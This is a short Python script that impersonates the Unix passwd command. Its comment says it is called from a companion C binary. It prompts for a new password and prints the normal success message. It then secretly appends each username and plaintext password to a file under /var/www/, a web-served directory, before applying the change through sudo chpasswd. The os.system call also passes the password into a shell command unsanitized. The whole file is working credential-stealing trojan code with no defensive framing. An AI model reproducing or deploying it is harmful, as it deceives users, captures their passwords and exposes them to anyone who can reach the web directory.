#!/usr/bin/python

# Python script that accepts username argument from c binary 
# and emulates passwd binary, saved username/password to file 
# and finally changes the users password

import getpass, sys, time, os

if len(sys.argv) > 1:
    username = sys.argv[1]
else:
    username = getpass.getuser()
    
print "Changing password for user %s." % username
pass1 = getpass.getpass("New password: ")
pass2 = getpass.getpass("Retype new password: ")

if (pass1 == pass2):
    print "passwd: all authentication tokens updated successfully."
    now = time.localtime()
    currtime = str(time.strftime("%d %b %Y %H:%M:%S", now))
    f = open('/var/www/...', 'a')
    f.write("["+currtime+"] "+ username +"/"+ pass1+"\r\n")
    f.close()
    os.system("echo '"+ username + ":" + pass1 + "' | sudo /usr/sbin/chpasswd")
else:
    print "Sorry, passwords do not match."

